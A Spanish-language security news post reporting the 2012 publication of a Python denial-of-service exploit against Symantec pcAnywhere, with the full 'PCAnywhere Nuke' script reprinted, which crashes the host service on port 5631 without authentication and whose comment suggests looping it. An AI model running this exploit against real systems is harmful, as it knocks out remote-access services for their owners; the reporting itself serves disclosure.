Publicado exploit que hace fallar pcAnywhere

El pasado viernes 17 de febrero Johnathan Norman, director de investigación en seguridad de Alert Logic, publicó en Pastebin código en Python que puede causar una denegación de servicio (DoS) en versiones de pcAnywhere en Windows, incluso parcheadas (versión 12.5.0 build 463 y posteriores).

Concretamente este breve script denominado "PCAnywhere Nuke" hace fallar (crash) el servicio
ashost32 sin necesidad de pre-autenticarse en el equipo de la víctima:

 #!/usr/bin/python
'''
Exploit Title: PCAnywhere Nuke
Date: 2/16/12
Author: Johnathan Norman spoofy <at> exploitscience.org or @spoofyroot
Version: PCAnyWhere (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real pain you'll need to loop this.. my inital impressions
are that controlling execuction will be a pain.
'''
import sys
import socket
import argparse
if len(sys.argv) != 2:
print "[+] Usage: ./pcNuke.py <HOST>"
sys.exit(1)
HOST = sys.argv[1]
PORT = 5631
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# HELLO!
s.send("\x00\x00\x00\x00")
buf = s.recv(1024)
# ACK!
s.send("\x6f\x06\xfe")
buf = s.recv(1024)
# Auth capability part 1
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
# Auth capability part 2
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")

Además recordemos que, hace un mes, Symantec recomendó a sus usuarios desactivar pcAnywhere hasta que publicaran un parche para solucionar otra vulnerabilidad crítica que podría permitir la ejecución remota de código. Su descubridor, Edward Torkington de NGS Secure, no publicará los detalles de este bug hasta el próximo 25 de abril de 2012.

Si a esto le sumamos las también recientes filtraciones de código fuente con intento de extorsión incluido, podemos vislumbrar que últimamente no corren buenos tiempos para Symantec...

Comentarios